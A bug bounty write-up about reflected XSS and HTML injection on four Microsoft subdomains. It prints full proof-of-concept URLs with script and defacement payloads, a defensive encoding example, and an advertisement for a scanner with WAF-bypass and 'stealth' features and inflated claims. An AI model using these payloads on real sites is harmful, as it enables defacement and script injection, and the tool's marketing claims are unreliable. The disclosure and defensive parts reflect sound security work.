My Journey to Uncovering Reflected XSS and HTML Injection in 4 Microsoft Subdomains

xss0r
8 min read · Jun 14, 2024


The Beginning

It was an ordinary morning, and I found myself pondering what to test next in the vast realm of bug bounty. My mind wandered through countless possibilities until it landed on an intriguing idea: testing Microsoft’s domains. With a spark of curiosity, I embarked on a journey to explore and uncover potential vulnerabilities.

The Exploration

Enumerating Subdomains

I began by enumerating subdomains, systematically probing each one for weaknesses. It was a meticulous process, but my excitement grew with every discovery. Among the myriad of subdomains, one particular domain caught my attention: appleconfigurator2.manage.microsoft.com.

The Discovery

Initial Test: Reflection in Path

My initial tests revealed something interesting. I entered some value into the path of the URL:

https://appleconfigurator2.manage.microsoft.com/BadRequest.html/value

To my surprise, the value was reflected in the response. This observation signaled a potential vulnerability, prompting me to delve deeper, and I found another parameter: //?aspxerrorpath.

Uncovering Reflected XSS

With a hypothesis forming in my mind, I decided to test for XSS. Reflected XSS occurs when a web application includes user input in its output without proper sanitization or output encoding, allowing attackers to inject and execute malicious scripts. I crafted a payload and inserted it into the BadRequest parameter.

I started with payload: javascript:alert(1)

And I didn’t get any popup…

So I decided to run my #xss0r Tool on the path after “BadRequest.html”, using the tool's --path option, which supports XSS testing in web paths.

This tool is designed to test for XSS vulnerabilities efficiently. As expected, it generated numerous alerts, because it uses over 3000 differently encoded XSS payloads, confirming the presence of a Reflected XSS vulnerability. My tool made the process quick and seamless, demonstrating its effectiveness in identifying security issues.

Final URL for XSS:

Discovering HTML Injection

With the momentum from my XSS discovery, I shifted focus to testing for HTML Injection. This vulnerability involves injecting arbitrary HTML content into the page, which can lead to unauthorized actions (such as fake login forms or defacement) and information disclosure.

Payload:

';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20style=%22color:red;font-size:50px;%22%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%20%3Cspan%20style=%22color:red;font-size:60px;%22%3E1BR0%3C/span%3E%3C/marquee%3E

FINAL URL:

https://appleconfigurator2.manage.microsoft.com/BadRequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20style=%22color:red;font-size:50px;%22%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%20%3Cspan%20style=%22color:red;font-size:60px;%22%3E1BR0%3C/span%3E%3C/marquee%3E
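The two reflection contexts the URLs above exercise are a query value (aspxerrorpath) echoed into the HTML body and a path fragment echoed into a JavaScript string. The following is an added example, not code from the original post or from the #xss0r tool: a constructed error page rendered the vulnerable way and then with context-appropriate output encoding, plus the reflection check a defender can run against their own error pages. All function names and the page layout are assumptions.

```python
"""Added example, not from the original post or the #xss0r tool: the two
reflection contexts described above (query value in an HTML text node,
path fragment in a JavaScript string literal), vulnerable and fixed.
Function names and page layout are constructed for illustration."""
import html
import json
from urllib.parse import parse_qs, urlsplit

# Constructed, harmless probe: HTML metacharacters but no script.
PROBE = "<u>probe-7f3a</u>"


def parse_aspxerrorpath(url: str) -> str:
    """Return the percent-decoded aspxerrorpath query value ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("aspxerrorpath", [""])[0]


def render_body_vulnerable(errorpath: str) -> str:
    """Echoes the value verbatim into an HTML text node: markup is interpreted."""
    return f"<html><body><h1>Bad Request</h1><p>Path: {errorpath}</p></body></html>"


def render_body_fixed(errorpath: str) -> str:
    """HTML text-node context: &, <, >, and both quote characters become entities."""
    safe = html.escape(errorpath, quote=True)
    return f"<html><body><h1>Bad Request</h1><p>Path: {safe}</p></body></html>"


def render_script_vulnerable(path: str) -> str:
    """Places the path inside a single-quoted JS literal; a quote in it breaks out."""
    return f"<script>var p = '{path}';</script>"


def render_script_fixed(path: str) -> str:
    """JS string context: JSON-encode (handles quotes and backslashes), then
    escape '<' so the value can never close the surrounding <script> block."""
    literal = json.dumps(path).replace("<", "\\u003c")
    return f"<script>var p = {literal};</script>"


def reflects_unescaped(response_body: str, probe: str = PROBE) -> bool:
    """Detection check: True when the probe's raw markup survives in the response.
    A correctly encoded page contains at most the entity-encoded form."""
    return probe in response_body
```

HTML entity encoding alone does not fix the script-string case; each sink needs the encoding for its own context.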

Expanding the Search

With these findings, I decided to expand my search to other subdomains. I was eager to see if the vulnerabilities existed elsewhere. After thorough testing using my #xss0r Tool, I discovered the same Reflected XSS and HTML Injection vulnerabilities on three additional subdomains:

Domain 1: https://appleconfigurator2.manage-beta.microsoft.com

  • HTML Injection PoC URL:
https://appleconfigurator2.manage-beta.microsoft.com/BadRequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%201BR0%3C/marquee%3E%3C/div%3E%3Ctitle%3EWelcome%20to%20Hacked%20Page%3C/title%3E%3Cbody%20style=%22background-color:%20black;%20color:%20white;%20font-family:%20Arial,%20sans-serif;%22%3E%3Ch1%3EWelcome%20to%20the%20Hacked%20Page%3C/h1%3E%3Cp%3EThis%20page%20has%20been%20hacked!%3C/p%3E%3Cmenu%3E%3Cli%3E%3Ca%20href=%22#%22%3EHome%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EAbout%20Us%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EContact%3C/a%3E%3C/menu%3E%3Cstyle%3Eh1%20{%20animation:%20rainbowText%205s%20infinite;%20}%20@keyframes%20rainbowText%20{%200%%20{%20color:%20red;%20}%2016%%20{%20color:%20orange;%20}%2033%%20{%20color:%20yellow;%20}%2050%%20{%20color:%20green;%20}%2066%%20{%20color:%20blue;%20}%2083%%20{%20color:%20indigo;%20}%20100%%20{%20color:%20violet;%20}%20}%3C/style%3E%3C/body%3E

Domain 2: https://appleconfigurator2.manage-dogfood.microsoft.com

  • HTML Injection PoC URL:
https://appleconfigurator2.manage-dogfood.microsoft.com/badrequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20style=%22color:red;font-size:50px;%22%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%20%3Cspan%20style=%22color:red;font-size:60px;%22%3E1BR0%3C/span%3E%3C/marquee%3E

Domain 3: https://appleconfigurator2.manage-selfhost.microsoft.com

  • HTML Injection PoC URL:
https://appleconfigurator2.manage-selfhost.microsoft.com/BadRequest.html';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%201BR0%3C/marquee%3E%3C/div%3E%3Ctitle%3EWelcome%20to%20Hacked%20Page%3C/title%3E%3Cbody%20style=%22background-color:%20black;%20color:%20white;%20font-family:%20Arial,%20sans-serif;%22%3E%3Ch1%3EWelcome%20to%20the%20Hacked%20Page%3C/h1%3E%3Cp%3EThis%20page%20has%20been%20hacked!%3C/p%3E%3Cmenu%3E%3Cli%3E%3Ca%20href=%22#%22%3EHome%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EAbout%20Us%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EContact%3C/a%3E%3C/menu%3E%3Cstyle%3Eh1%20{%20animation:%20rainbowText%205s%20infinite;%20}%20@keyframes%20rainbowText%20{%200%%20{%20color:%20red;%20}%2016%%20{%20color:%20orange;%20}%2033%%20{%20color:%20yellow;%20}%2050%%20{%20color:%20green;%20}%2066%%20{%20color:%20blue;%20}%2083%%20{%20color:%20indigo;%20}%20100%%20{%20color:%20violet;%20}%20}%3C/style%3E%3C/body%3E

Conclusion

My journey to uncover these vulnerabilities highlights the critical importance of continuous security assessments. Using my #xss0r Tool, I was able to efficiently identify and validate Reflected XSS and HTML Injection vulnerabilities across four different Microsoft subdomains. This tool has proven to be an invaluable asset in my security toolkit, making the process of vulnerability detection both quick and effective.

By addressing these issues promptly, Microsoft can enhance the security of its applications, protect its users, and maintain trust in its brand. For further clarity, I have attached images and videos illustrating the exploitation of these vulnerabilities. If you have any questions or require additional information, feel free to contact me on my LinkedIn profile:

https://www.linkedin.com/in/ibrahim-husi%C4%87-101430102/

Proof of Concept:

And here is the video of the #xss0r Tool DEMO:

#xss0r Tool Presentation

🚀 Unlock the Power of XSS Vulnerability Detection with xss0r!🚀
Discover the cutting-edge features of #xss0r:
With features like:

✅ Zero False Positives
💡 Unique Innovation
🎯 Flexible Detection Modes
🔗 POST and GET Requests
🌐 DOM-Based XSS
🔍 Path-Based Analysis
📱 JSON Web Apps
📊 Exportable Reports
🔓 WAF Bypass
🕵️‍♂️ Stealth Mode
💼 Efficiency
💥 Over 2500 Encoded Payloads
🛠️ Lab-Tested and Field-Ready
🔄 Multi-threading
⏳ Customizable Delay
⚡️ Scans 2500 payloads on 1 URL in only 15 seconds! ⚡️🔥
🔌 XSS into all kinds of extensions
🔒 Secure and Reliable
🌟 Continuous Updates
📈 High Performance
🔄 Automated Scanning
🔍 Accurate Detection Algorithms
🔧 Easy Configuration
📂 Support for Various Web Technologies
🚀 Rapid Deployment
🔎 Advanced Search and Filter Options
🔧 Customizable Payloads

✅ Zero False Positives

Say goodbye to the noise. The #xss0r Tool is engineered to deliver zero false positives, ensuring that every alert is a genuine threat. Trust in its accuracy and save valuable time by focusing only on real vulnerabilities.

💡 Unique Innovation

Harness the power of unique innovation that drives the #xss0r Tool. It integrates advanced algorithms and techniques that you won’t find anywhere else, giving you a cutting-edge advantage in identifying and mitigating XSS vulnerabilities.

🎯 Flexible Detection Modes

Adapt to any scenario with flexible detection modes. Whether you need to scan quickly or perform a deep analysis, the #xss0r Tool offers customizable options to fit your specific needs and ensure comprehensive coverage.

🔗 POST and GET Requests

Thoroughly test your web applications with support for both POST and GET requests. This ensures that every potential entry point for XSS attacks is examined, providing robust security for your web properties.

🌐 DOM-Based XSS

Stay ahead of attackers with the ability to detect DOM-based XSS vulnerabilities. The #xss0r Tool delves into client-side scripts, identifying threats that traditional tools often miss.

🔍 Path-Based Analysis

Benefit from path-based analysis that tracks how data flows through your application. This allows for pinpoint detection of vulnerabilities, ensuring no critical paths are left unchecked.

📱 JSON Web Apps

In the era of dynamic web applications, the #xss0r Tool excels at scanning JSON Web Apps. It understands and parses JSON, detecting vulnerabilities in modern web architectures.

📊 Exportable Reports

Communicate findings effectively with exportable reports. Share detailed, professional reports with stakeholders, demonstrating the thoroughness and effectiveness of your security efforts.

🔓 WAF Bypass

Overcome the barriers of Web Application Firewalls with WAF bypass capabilities. The #xss0r Tool is designed to evade WAF protections, ensuring a true assessment of your web security.

🕵️‍♂️ Stealth Mode

Operate under the radar with stealth mode. Conduct scans discreetly without alerting potential intruders, maintaining the element of surprise and security.

💼 Efficiency

Experience unmatched efficiency in your security processes. The #xss0r Tool maximizes productivity, allowing you to secure your applications faster and with greater accuracy.

💥 Over 2500 Encoded Payloads

Leverage the power of over 2500 encoded payloads to test a wide range of XSS attack vectors. This comprehensive approach ensures no stone is left unturned in your security assessments.

🛠️ Lab-Tested and Field-Ready

Rest assured with a tool that is lab-tested and field-ready. The #xss0r Tool has been rigorously tested in both controlled environments and real-world scenarios, guaranteeing its reliability and effectiveness.

🔄 Multi-threading

Speed up your scanning process with multi-threading. The #xss0r Tool efficiently utilizes system resources, allowing for concurrent scanning and faster results.

⏳ Customizable Delay

Tailor your scans with customizable delay settings. Control the pacing of your tests to match your specific environment and requirements, ensuring optimal performance and accuracy.

⚡️ Scans 2500 Payloads on 1 URL in Only 15 Seconds! ⚡️🔥

Achieve unparalleled speed with the ability to scan 2500 payloads on 1 URL in just 15 seconds. This blazing-fast performance sets a new standard in web security, enabling rapid and thorough assessments.

🔌 XSS into all kinds of extensions🔌

Expand your security coverage with XSS detection into all kinds of URL extensions. The #xss0r Tool supports testing XSS vulnerabilities in various URL extensions, such as changing login.php to test payloads like {payload}.php. This ensures comprehensive testing across different file types and URL structures.

🔒 Secure and Reliable🔒

Rely on a tool designed with security and reliability at its core. The #xss0r Tool employs robust security measures to ensure your data and processes remain protected, providing peace of mind as you test for vulnerabilities.

🌟 Continuous Updates🌟

Stay ahead of evolving threats with continuous updates. The #xss0r Tool is regularly updated with the latest techniques and payloads, ensuring it remains effective against the newest vulnerabilities and attack vectors.

📈 High Performance📈

Experience top-tier performance with the #xss0r Tool. Optimized for speed and efficiency, it delivers rapid and accurate results, allowing you to secure your applications without compromising on performance.

🔄 Automated Scanning🔄

Automate your security processes with ease. The #xss0r Tool supports fully automated scanning, enabling you to schedule regular scans and maintain continuous security monitoring with minimal manual intervention.

🔍 Accurate Detection Algorithms🔍

Benefit from precise and reliable vulnerability detection. The #xss0r Tool uses advanced algorithms to accurately identify XSS vulnerabilities, minimizing false positives and ensuring thorough coverage.

🔧 Easy Configuration🔧

Set up and start scanning quickly with easy configuration options. The #xss0r Tool offers user-friendly settings and intuitive controls, making it accessible even for those new to web security testing.

📂 Support for Various Web Technologies📂

Ensure comprehensive security across different platforms. The #xss0r Tool supports a wide range of web technologies, providing versatile scanning capabilities for diverse web environments.

🚀 Rapid Deployment🚀

Deploy the #xss0r Tool swiftly and efficiently. Its straightforward installation process and minimal setup requirements mean you can start securing your applications in no time.

🔎 Advanced Search and Filter Options🔎

Streamline your analysis with advanced search and filter options. The #xss0r Tool allows you to quickly locate specific vulnerabilities and focus on the most critical issues, enhancing your productivity and effectiveness.

🔧 Customizable Payloads🔧

Customize your testing with tailored payloads. The #xss0r Tool supports the creation and use of custom payloads, allowing you to adapt your scans to specific needs and scenarios for more precise vulnerability detection.

Proven Performance in Bug Bounty Platforms

The #xss0r Tool has been proven on tens of bug bounty platforms, including Microsoft. In just 2 months, I discovered over 30 XSS vulnerabilities using this tool. Imagine the potential earnings: bug bounty platforms pay between $500 and $3000 for XSS findings. By investing a modest amount between $20 to $70 in this tool, you can earn tens of thousands of dollars. It’s a smart investment for passive income. Simply collect URLs, run the tool overnight, and wake up to results in the morning. That’s how I’ve been doing it, and now you can too.

Remember how many bug bounty platforms there are, and if you find just one XSS vulnerability on each of these platforms, you could earn over hundreds of thousands in a year by focusing clearly and testing all possible inputs and fields. You can be confident that if there is an XSS vulnerability, this tool will find it. You will be sure that it will find it.

Embrace the future of web security with the #xss0r Tool and elevate your vulnerability detection to new heights. Don’t just secure your web applications — dominate the landscape with the most advanced XSS tool available.

#xss0r #ibrahimXSS #@ibrahimxss0r #ibrahimxss0r #xsstool

